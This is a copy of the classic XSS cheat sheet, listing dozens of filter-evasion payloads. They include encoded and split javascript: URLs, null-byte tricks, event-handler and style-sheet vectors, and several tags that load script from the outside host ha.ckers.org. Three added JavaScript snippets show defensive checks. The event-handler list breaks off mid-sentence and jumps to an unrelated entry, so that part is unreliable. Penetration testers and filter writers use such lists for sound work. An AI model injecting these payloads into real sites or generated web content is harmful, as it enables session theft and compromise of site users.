XSS Cross Site Scripting Cheat Sheet

The document contains various techniques for testing cross-site scripting (XSS) vulnerabilities, including strings that can be injected to potentially execute JavaScript if a site is vulnerable. Some examples include encoding JavaScript code in image tags, using Unicode encoding, and breaking up the code with special characters like tabs. The techniques target different browsers and aim to evade various XSS filters.

The "Browser support" line under each vector lists the browsers the vector was tested against: IE 7.0, IE 6.0, Netscape 8.1 in IE rendering mode (NS8.1-IE), Netscape 8.1 in Gecko rendering mode (NS8.1-G), Firefox 2.0, Opera 9.02 and, where marked, Netscape 4. The original page showed the per-browser result with coloured icons that are not reproduced here, so a browser appearing in the list does not by itself mean the vector works in that browser; the prose of each entry states where it does.

Uploaded by srilankanonline
Copyright: Attribution Non-Commercial (BY-NC)

XSS locator. Inject this string, and in most cases where a script is vulnerable with no special XSS vector requirements the word "XSS" will pop up. Use the URL encoding calculator (on the original page) to encode the entire string. Tip: if you're in a rush and need to quickly check a page, often injecting the deprecated "<PLAINTEXT>" tag will be enough to check to see if something is vulnerable to XSS by messing up the output appreciably:
';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
Browser support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]

XSS locator 2. If you don't have much space and know there is no vulnerable JavaScript on the page, this string is a nice compact XSS injection check. View source after injecting it and look for <XSS versus &lt;XSS to see if it is vulnerable:
'';!--"<XSS>=&{()}
Browser support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]

No filter evasion. This is a normal XSS JavaScript injection, and most likely to get caught, but I suggest trying it first (the quotes are not required in any modern browser so they are omitted here):
<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>
Browser support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]

Image XSS using the JavaScript directive (IE7.0 doesn't support the JavaScript directive in the context of an image, but it does in other contexts; the following shows the principle, which would work in other tags as well. I'll probably revise this at a later date):
<IMG SRC="javascript:alert('XSS');">
Browser support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]

No quotes and no semicolon:
<IMG SRC=javascript:alert('XSS')>
Browser support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]

Case insensitive XSS attack vector:
<IMG SRC=JaVaScRiPt:alert('XSS')>
Browser support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]

HTML entities (the semicolons are required for this to work):
<IMG SRC=javascript:alert(&quot;XSS&quot;)>
Browser support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]

Grave accent obfuscation (if you need to use both double and single quotes you can use a grave accent to encapsulate the JavaScript string; this is also useful because lots of cross site scripting filters don't know about grave accents):
<IMG SRC=`javascript:alert("RSnake says, 'XSS'")`>
Browser support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]

Malformed IMG tags. Originally found by Begeek (but cleaned up and shortened to work in all browsers), this XSS vector uses the relaxed rendering engine to create our XSS vector within an IMG tag that should be encapsulated within quotes. I assume this was originally meant to correct sloppy coding. This would make it significantly more difficult to correctly parse apart an HTML tag:
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">
Browser support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]

fromCharCode (if no quotes of any kind are allowed you can eval() a fromCharCode in JavaScript to create any XSS vector you need). Click here to build your own (thanks to Hannes Leopold):
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
Browser support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]

UTF-8 Unicode encoding (all of the XSS examples that use a javascript: directive inside of an <IMG tag will not work in Firefox or Netscape 8.1+ in the Gecko rendering engine mode). Use the XSS calculator for more information:
<IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;>
Browser support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]

Long UTF-8 Unicode encoding without semicolons (this is often effective in XSS that attempts to look for "&#XX;", since most people don't know about padding, up to 7 numeric characters total). This is also useful against people who decode against strings like $tmp_string =~ s/.*\&#(\d+).*/$1/ which incorrectly assumes a semicolon is required to terminate an HTML-encoded string (I've seen this in the wild):
<IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041>
Browser support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]

Hex encoding without semicolons (this is also a viable XSS attack against the above string $tmp_string =~ s/.*\&#(\d+).*/$1/ which assumes that there is a numeric character following the pound symbol, which is not true with hex HTML characters). Use the XSS calculator for more information:
<IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>
Browser support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]

Embedded tab to break up the cross site scripting attack (the character between "jav" and "ascript" is a literal horizontal tab):
<IMG SRC="jav	ascript:alert('XSS');">
Browser support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]

Embedded encoded tab to break up XSS:
<IMG SRC="jav&#x09;ascript:alert('XSS');">
Browser support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]

Embedded newline to break up XSS. Some websites claim that any of the chars 09-13 (decimal) will work for this attack. That is incorrect. Only 09 (horizontal tab), 10 (newline) and 13 (carriage return) work. See the ASCII chart for more details. The following four XSS examples illustrate this vector:
<IMG SRC="jav&#x0A;ascript:alert('XSS');">
Browser support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]

Embedded carriage return to break up XSS (Note: with the above I am making these strings longer than they have to be because the zeros could be omitted. Often I've seen filters that assume the hex and dec encoding has to be two or three characters. The real rule is 1-7 characters.):
<IMG SRC="jav&#x0D;ascript:alert('XSS');">
Browser support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]

Multiline injected JavaScript using ASCII carriage returns (same as above, only a more extreme example of this XSS vector); the line breaks below are not spaces, just one of the three characters described above:
<IMG
SRC
=
"
j
a
v
a
s
c
r
i
p
t
:
a
l
e
r
t
(
'
X
S
S
'
)
"
>
Browser support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]

Null breaks up JavaScript directive. Okay, I lied, null chars also work as XSS vectors but not like above; you need to inject them directly using something like Burp Proxy or use %00 in the URL string, or if you want to write your own injection tool you can either use vim (^V^@ will produce a null) or the following program to generate it into a text file. Okay, I lied again, older versions of Opera (circa 7.11 on Windows) were vulnerable to one additional char, 173 (the soft hyphen control char). But the null char %00 is much more useful and helped me bypass certain real world filters with a variation on this example:
perl -e 'print "<IMG SRC=java\0script:alert(\"XSS\")>";' > out
Browser support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]

Null breaks up cross site scripting vector. Here is a little known XSS attack vector using null characters. You can actually break up the HTML itself using the same nulls as shown above. I've seen this vector bypass some of the most restrictive XSS filters to date:
perl -e 'print "<SCR\0IPT>alert(\"XSS\")</SCR\0IPT>";' > out
Browser support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]

Spaces and meta chars before the JavaScript in images for XSS (this is useful if the pattern match doesn't take into account spaces in the word "javascript:", which is correct since that won't render, and makes the false assumption that you can't have a space between the quote and the "javascript:" keyword. The actual reality is you can have any char from 1-32 in decimal):
<IMG SRC=" &#14;  javascript:alert('XSS');">
Browser support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]
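The vectors from the long-decimal, hex, embedded tab/newline/carriage-return and leading-control-character entries above all defeat a filter that searches the raw attribute value for "javascript:". The following is an added example, not code from the original cheat sheet: it models the two steps a browser performs before the scheme is compared. The HTML tokenizer decodes numeric character references with or without a trailing semicolon, decimal or hex, with any number of digits (so the 7-digit padding above is covered), and the URL parser strips leading control characters and spaces and removes tab, LF and CR anywhere in the URL. The null-byte vector is deliberately not normalised away: that was old-IE behaviour, and a NUL inside the scheme makes a modern URL parser reject it. The sample inputs are the page's own vectors; the names decodeNumericRefs, canonicalScheme and isScriptUrl are this example's, not a library API.

```javascript
// Added example: a model of how a browser canonicalises an attribute URL
// before the scheme is compared, and the raw-string check it defeats.
// decodeNumericRefs, canonicalScheme and isScriptUrl are this example's own names.

// The sort of filter the encoded and split "javascript:" vectors evade.
const RAW_JAVASCRIPT_FILTER = /javascript:/i;

// HTML tokenizer behaviour: numeric character references are decoded with
// or without the trailing semicolon, in decimal or hex, with any number of
// digits (so &#0000106 and &#x6A both become "j").
function decodeNumericRefs(value) {
  return value.replace(/&#(x[0-9a-f]+|[0-9]+);?/gi, (match, code) => {
    const cp = /^x/i.test(code) ? parseInt(code.slice(1), 16) : parseInt(code, 10);
    return cp > 0x10ffff ? match : String.fromCodePoint(cp);
  });
}

// URL parser behaviour: leading C0 controls and spaces are stripped, and
// tab, LF and CR are removed wherever they occur, before the scheme is read.
function canonicalScheme(attrValue) {
  let s = decodeNumericRefs(attrValue);
  s = s.replace(/^[\x00-\x20]+/, '');
  s = s.replace(/[\t\n\r]/g, '');
  const m = /^([a-z][a-z0-9+.-]*):/i.exec(s);
  return m ? m[1].toLowerCase() : null;
}

// The check a filter should make: decide on the canonical scheme, never on
// the raw bytes. A NUL inside the scheme (the old-IE null-byte vector) is
// not stripped here, so it does not parse as a scheme at all.
function isScriptUrl(attrValue) {
  return canonicalScheme(attrValue) === 'javascript';
}

// Constructed sample: the page's hex-without-semicolons vector.
const HEX_VECTOR = "&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29";
console.log(RAW_JAVASCRIPT_FILTER.test(HEX_VECTOR), isScriptUrl(HEX_VECTOR)); // false true
```

The point of canonicalScheme is that the decision is made on the same representation the browser acts on; any filter that inspects the bytes before decoding is testing a string the browser never sees.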

Non-alpha-non-digit XSS. While I was reading the Firefox HTML parser I found that it assumes a non-alpha-non-digit is not valid after an HTML keyword and therefore considers it to be a whitespace or non-valid token after an HTML tag. The problem is that some XSS filters assume that the tag they are looking for is broken up by whitespace. For example "<SCRIPT\s" != "<SCRIPT/XSS\s":
<SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT>
Browser support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]

Non-alpha-non-digit part 2 XSS. yawnmoth brought my attention to this vector, based on the same idea as above; however, I expanded on it using my fuzzer. The Gecko rendering engine allows for any character other than letters, numbers or encapsulation chars (like quotes, angle brackets, etc.) between the event handler and the equals sign, making it easier to bypass cross site scripting blocks. Note that this also applies to the grave accent char as seen here:
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>
Browser support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]

Non-alpha-non-digit part 3 XSS. Yair Amit brought to my attention that there is slightly different behavior between the IE and Gecko rendering engines that allows just a slash between the tag and the parameter with no spaces. This could be useful if the system does not allow spaces.
<SCRIPT/SRC="http://ha.ckers.org/xss.js"></SCRIPT>
Browser support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]

Extraneous open brackets. Submitted by Franz Sedlmaier, this XSS vector could defeat certain detection engines that work by first using matching pairs of open and close angle brackets and then by doing a comparison of the tag inside, instead of a more efficient algorithm like Boyer-Moore that looks for entire string matches of the open angle bracket and associated tag (post de-obfuscation, of course). The double slash comments out the ending extraneous bracket to suppress a JavaScript error:
<<SCRIPT>alert("XSS");//<</SCRIPT>
Browser support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]
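The three non-alpha-non-digit entries and the extraneous-bracket entry above beat filters that look for "<SCRIPT" followed by whitespace, or that pair up angle brackets. The JavaScript below is an added example, not code from the original cheat sheet: a small tokenizer that follows the HTML tag-open and attribute-name rules the vectors exploit (a tag name ends at whitespace, "/" or ">"; a "<" followed by anything but a letter, "/", "!" or "?" is plain text; an attribute name runs until whitespace, "/", "=" or ">"), with an allowlist check made on the resulting tokens rather than on the raw markup, so "<SCRIPT/XSS", "<<SCRIPT>" and an onload handler padded with punctuation are all caught. The tag allowlist, the names tokenizeTags and findViolations, and the benign sample in the test are this example's own assumptions. Checking the URL scheme carried by src and href values is a separate step not shown here.

```javascript
// Added example: a minimal tokenizer following the HTML tag-open and
// attribute-name rules the vectors above rely on, plus an allowlist check
// built on the tokens rather than on regexes over raw markup.
// tokenizeTags, findViolations and ALLOWED_TAGS are this example's own names.

const WS = /[\t\n\f\r ]/;
const ALLOWED_TAGS = new Set(['p', 'b', 'i', 'a', 'br', 'ul', 'li', 'img']); // assumed policy

// A filter of the kind "<SCRIPT/XSS" and "<<SCRIPT>" are built to evade.
const NAIVE_SCRIPT_FILTER = /<script\s/i;

function tokenizeTags(html) {
  const tags = [];
  let i = 0;
  while (i < html.length) {
    if (html[i] !== '<') { i++; continue; }
    const next = html[i + 1];
    if (next === '!' || next === '?') {            // comment or bogus comment: skip to '>'
      const end = html.indexOf('>', i + 2);
      i = end === -1 ? html.length : end + 1;
      continue;
    }
    const closing = next === '/';
    let j = closing ? i + 2 : i + 1;
    if (!/[A-Za-z]/.test(html[j] || '')) { i++; continue; } // "<<": this '<' is only text
    let name = '';
    while (j < html.length && !WS.test(html[j]) && html[j] !== '/' && html[j] !== '>') {
      name += html[j++];                            // tag name ends at whitespace, '/' or '>'
    }
    const attrs = [];
    while (j < html.length && html[j] !== '>') {
      if (WS.test(html[j]) || html[j] === '/') { j++; continue; } // '/' is just a separator
      let attr = '';
      if (html[j] === '=') attr += html[j++];       // a leading '=' is part of the name
      while (j < html.length && !WS.test(html[j]) && html[j] !== '/' && html[j] !== '=' && html[j] !== '>') {
        attr += html[j++];                          // anything else, punctuation included, is name
      }
      while (j < html.length && WS.test(html[j])) j++;
      let value = null;
      if (html[j] === '=') {
        j++;
        while (j < html.length && WS.test(html[j])) j++;
        const q = html[j];
        if (q === '"' || q === "'") {
          const end = html.indexOf(q, j + 1);
          value = html.slice(j + 1, end === -1 ? html.length : end);
          j = end === -1 ? html.length : end + 1;
        } else {
          value = '';
          while (j < html.length && !WS.test(html[j]) && html[j] !== '>') value += html[j++];
        }
      }
      attrs.push({ name: attr, value });
    }
    tags.push({ name: name.toLowerCase(), closing, attrs });
    i = j + 1;
  }
  return tags;
}

// Policy check on tokens: unknown tags, on* handlers (after dropping the
// punctuation Gecko tolerated between the handler name and '=') and style.
function findViolations(html) {
  const out = [];
  for (const t of tokenizeTags(html)) {
    if (t.closing) continue;
    if (!ALLOWED_TAGS.has(t.name)) out.push('tag:' + t.name);
    for (const a of t.attrs) {
      const norm = (a.name.match(/^[a-z0-9]+/i) || [''])[0].toLowerCase();
      if (norm.startsWith('on') || norm === 'style') out.push('attr:' + t.name + '.' + norm);
    }
  }
  return out;
}
```

A real sanitizer should serialise the accepted tokens back to markup itself rather than pass the original string through once it has been checked; the tokenizer here only shows why the decision has to be taken on tokens.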

No closing script tags. In Firefox and Netscape 8.1 in the Gecko rendering engine mode you don't actually need the "></SCRIPT>" portion of this Cross Site Scripting vector. Firefox assumes it's safe to close the HTML tag and add closing tags for you. How thoughtful! Unlike the next one, which doesn't affect Firefox, this does not require any additional HTML below it. You can add quotes if you need to, but they're not needed generally, although beware, I have no idea what the HTML will end up looking like once this is injected:
<SCRIPT SRC=http://ha.ckers.org/xss.js?<B>
Browser support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]

Protocol resolution in script tags. This particular variant was submitted by Łukasz Pilorz and was based partially off of Ozh's protocol resolution bypass below. This cross site scripting example works in IE, Netscape in IE rendering mode and Opera if you add in a </SCRIPT> tag at the end. However, this is especially useful where space is an issue, and of course, the shorter your domain, the better. The ".j" is valid, regardless of the encoding type, because the browser knows it in the context of a SCRIPT tag.
<SCRIPT SRC=//ha.ckers.org/.j>
Browser support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]

Half open HTML/JavaScript XSS vector. Unlike Firefox, the IE rendering engine doesn't add extra data to your page, but it does allow the javascript: directive in images. This is useful as a vector because it doesn't require a close angle bracket. This assumes there is any HTML tag below where you are injecting this cross site scripting vector. Even though there is no close ">" tag the tags below it will close it. A note: this does mess up the HTML, depending on what HTML is beneath it. It gets around the following NIDS regex: /((\%3D)|(=))[^\n]*((\%3C)|<)[^\n]+((\%3E)|>)/ because it doesn't require the end ">". As a side note, this was also effective against a real world XSS filter I came across using an open ended <IFRAME tag instead of an <IMG tag:
<IMG SRC="javascript:alert('XSS')"
Browser support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]

Double open angle brackets. This is an odd one that Steven Christey brought to my attention. At first I misclassified this as the same XSS vector as above but it's surprisingly different. Using an open angle bracket at the end of the vector instead of a close angle bracket causes different behavior in Netscape Gecko rendering. Without it, Firefox will work but Netscape won't:
<iframe src=http://ha.ckers.org/scriptlet.html <
Browser support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]

XSS with no single quotes or double quotes or semicolons (the line break after the regex literal is what separates the two statements):
<SCRIPT>a=/XSS/
alert(a.source)</SCRIPT>
Browser support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]

Escaping JavaScript escapes. When the application is written to output some user information inside of a JavaScript block like the following: <SCRIPT>var a="$ENV{QUERY_STRING}";</SCRIPT> and you want to inject your own JavaScript into it but the server side application escapes certain quotes, you can circumvent that by escaping their escape character. When this gets injected it will read <SCRIPT>var a="\\";alert('XSS');//";</SCRIPT> which ends up un-escaping the double quote and causing the Cross Site Scripting vector to fire. The XSS locator uses this method:
\";alert('XSS');//
Browser support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]
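As an added example (not code from the original page), the vector above run against a model of the <SCRIPT>var a="$ENV{QUERY_STRING}";</SCRIPT> template: one renderer only backslash-escapes double quotes, the way the entry describes, and the other escapes the value as a JavaScript string literal. The emitted script is executed with a stand-in alert() so the difference is observable in Node rather than in a browser. The payload constant, the function names and the use of JSON.stringify for the hardened escaper are this example's own choices.

```javascript
// Added example: the "escaping JavaScript escapes" vector against a model of
//   <SCRIPT>var a="$ENV{QUERY_STRING}";</SCRIPT>
// rendered by a server that only backslash-escapes double quotes, next to a
// string-literal escaper that closes the hole. All names are this example's.

// The page's payload, as a JS string: \";alert('XSS');//
const PAYLOAD = '\\";alert(\'XSS\');//';

// Vulnerable: turns " into \" but leaves the attacker's own backslash alone,
// so \" becomes \\" and the quote is live again.
function naiveEscape(untrusted) {
  return untrusted.replace(/"/g, '\\"');
}

// Hardened: JSON.stringify escapes backslash, quotes and control characters
// as a JS string literal; '<' is escaped too so "</script>" inside the value
// cannot close the script block.
function jsStringEscape(untrusted) {
  return JSON.stringify(untrusted).slice(1, -1).replace(/</g, '\\u003c');
}

function renderScript(escape, untrusted) {
  return 'var a="' + escape(untrusted) + '";';
}

// Runs the emitted script with a stand-in alert() so the effect is observable:
// returns the alert arguments and the final value of `a`. The newline before
// "return" matters: the vulnerable script ends in a // comment.
function runEmittedScript(script) {
  const alerts = [];
  const a = new Function('alert', script + '\nreturn a;')(msg => alerts.push(String(msg)));
  return { alerts, a };
}

console.log(renderScript(naiveEscape, PAYLOAD));    // var a="\\";alert('XSS');//";
console.log(renderScript(jsStringEscape, PAYLOAD));  // var a="\\\";alert('XSS');//";
```

The rule the vulnerable renderer breaks is that every character with meaning inside a JavaScript string literal, the backslash first of all, has to be escaped, not just the delimiter; escaping only the delimiter lets the attacker supply the backslash that neutralises the server's.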

End title tag. This is a simple XSS vector that closes <TITLE> tags, which can encapsulate the malicious cross site scripting attack:
</TITLE><SCRIPT>alert("XSS");</SCRIPT>
Browser support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]

INPUT image:
<INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">
Browser support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]

BODY image:
<BODY BACKGROUND="javascript:alert('XSS')">
Browser support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]

BODY tag (I like this method because it doesn't require using any variants of "javascript:" or "<SCRIPT..." to accomplish the XSS attack). Dan Crowley additionally noted that you can put a space before the equals sign ("onload=" != "onload ="):
<BODY ONLOAD=alert('XSS')>
Browser support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]

Event Handlers that can be used in similar XSS attacks to the one above (this is the most comprehensive list on the net, at the time of this writing). Please note I have excluded browser support from this section because each one may have different results in different browsers. Thanks to Rene Ledosquet for the HTML+TIME updates:
1. FSCommand() (attacker can use this when executed from within an embedded Flash object)
2. onAbort() (when user aborts the loading of an image)
3. onActivate() (when object is set as the active element)
4. onAfterPrint() (activates after user prints or previews print job)
5. onAfterUpdate() (activates on data object after updating data in the source object)
6. onBeforeActivate() (fires before the object is set as the active element)
7. onBeforeCopy() (attacker executes the attack string right before a selection is copied to the clipboard; attackers can do this with the execCommand("Copy") function)
8. onBeforeCut() (attacker executes the attack string right before a selection is cut)
9. onBeforeDeactivate() (fires right after the activeElement is changed from the current object)
10. onBeforeEditFocus() (fires before an object contained in an editable element enters a UI-activated state or when an editable container object is control selected)
11. onBeforePaste() (user needs to be tricked into pasting or be forced into it using the

IMG Dynsrc:
<IMG DYNSRC="javascript:alert('XSS')">
Browser support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]

IMG lowsrc:
<IMG LOWSRC="javascript:alert('XSS')">
Browser support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]

BGSOUND:
<BGSOUND SRC="javascript:alert('XSS');">
Browser support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]

& JavaScript includes (works in Netscape 4.x):
<BR SIZE="&{alert('XSS')}">
Browser support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02] [NS4]

LAYER (also only works in Netscape 4.x):
<LAYER SRC="http://ha.ckers.org/scriptlet.html"></LAYER>
Browser support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02] [NS4]

STYLE sheet:
<LINK REL="stylesheet" HREF="javascript:alert('XSS');">
Browser support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]

Remote style sheet (using something as simple as a remote style sheet you can include your XSS, as the style parameter can be redefined using an embedded expression). This only works in IE and Netscape 8.1+ in IE rendering engine mode. Notice that there is nothing on the page to show that there is included JavaScript. Note: with all of these remote style sheet examples they use the body tag, so it won't work unless there is some content on the page other than the vector itself, so you'll need to add a single letter to the page to make it work if it's an otherwise blank page:
<LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css">
Browser support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]

Remote style sheet part 2 (this works the same as above, but uses a <STYLE> tag instead of a <LINK> tag). A slight variation on this vector was used to hack Google Desktop. As a side note, you can remove the end </STYLE> tag if there is HTML immediately after the vector to close it. This is useful if you cannot have either an equals sign or a slash in your cross site scripting attack, which has come up at least once in the real world:
<STYLE>@import'http://ha.ckers.org/xss.css';</STYLE>
Browser support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]

Remote style sheet part 3. This only works in Opera 8.0 (no longer in 9.x) but is fairly tricky. According to RFC 2616 setting a link header is not part of the HTTP 1.1 spec, however some browsers still allow it (like Firefox and Opera). The trick here is that I am setting a header (which is basically no different than in the HTTP header saying Link: <http://ha.ckers.org/xss.css>; REL=stylesheet) and the remote style sheet with my cross site scripting vector is running the JavaScript, which is not supported in Firefox:
<META HTTP-EQUIV="Link" Content="<http://ha.ckers.org/xss.css>; REL=stylesheet">
Browser support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]

Remote style sheet part 4. This only works in Gecko rendering engines and works by binding an XUL file to the parent page. I think the irony here is that Netscape assumes that Gecko is safer and therefore is vulnerable to this for the vast majority of sites:
<STYLE>BODY{-moz-binding:url("http://ha.ckers.org/xssmoz.xml#xss")}</STYLE>
Browser support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]

Local htc file. This is a little different than the above two cross site scripting vectors because it uses an .htc file which must be on the same server as the XSS vector. The example file works by pulling in the JavaScript and running it as part of the style attribute:
<XSS STYLE="behavior: url(xss.htc);">
Browser support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]

List-style-image. Fairly esoteric issue dealing with embedding images for bulleted lists. This will only work in the IE rendering engine because of the JavaScript directive. Not a particularly useful cross site scripting vector:
<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS
Browser support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]

VBscript in an image:
<IMG SRC='vbscript:msgbox("XSS")'>
Browser support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]

Mocha (older versions of Netscape only):
<IMG SRC="mocha:[code]">
Browser support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02] [NS4]

Livescript (older versions of Netscape only):
<IMG SRC="livescript:[code]">
Browser support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02] [NS4]

US-ASCII encoding (found by Kurt Huwig). This uses malformed ASCII encoding with 7 bits instead of 8 (each high-bit byte below, for example ¼ for "<" and ¾ for ">", is the intended ASCII character plus 0x80). This XSS may bypass many content filters but only works if the host transmits in US-ASCII encoding, or if you set the encoding yourself. This is more useful against web application firewall cross site scripting evasion than it is server side filter evasion. Apache Tomcat is the only known server that transmits in US-ASCII encoding. I highly suggest anyone interested in alternate encoding issues look at my charsets issues page:
¼script¾alert(¢XSS¢)¼/script¾
Browser support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02] [NS4]

META (the odd thing about meta refresh is that it doesn't send a referrer in the headers, so it can be used for certain types of attacks where you need to get rid of referring URLs):
<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');">
Browser support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]

META using the data: directive URL scheme. This is nice because it also doesn't have anything visible that has the word SCRIPT or the JavaScript directive in it, because it utilizes base64 encoding. Please see RFC 2397 for more details, or go here or here to encode your own. You can also use the XSS calculator below if you just want to encode raw HTML or JavaScript as it has a Base64 encoding method:
<META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K">
Browser support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]

META with additional URL parameter. If the target website attempts to see if the URL contains "http://" at the beginning you can evade it with the following technique (submitted by Moritz Naumann):
<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">
Browser support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]

IFRAME (if iframes are allowed there are a lot of other XSS problems as well):
<IFRAME SRC="javascript:alert('XSS');"></IFRAME>
Browser support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]

FRAME (frames have the same sorts of XSS problems as iframes):
<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>
Browser support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]

TABLE (who would have thought tables were XSS targets... except me, of course):
<TABLE BACKGROUND="javascript:alert('XSS')">
Browser support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]

TD (just like above, TDs are vulnerable to BACKGROUNDs containing JavaScript XSS vectors):
<TABLE><TD BACKGROUND="javascript:alert('XSS')">
Browser support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]

DIV background-image:
<DIV STYLE="background-image: url(javascript:alert('XSS'))">
Browser support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]

DIV background-image with unicoded XSS exploit (this has been modified slightly to obfuscate the url parameter). The original vulnerability was found by Renaud Lifchitz as a vulnerability in Hotmail:
<DIV STYLE="background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029">
Browser support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]

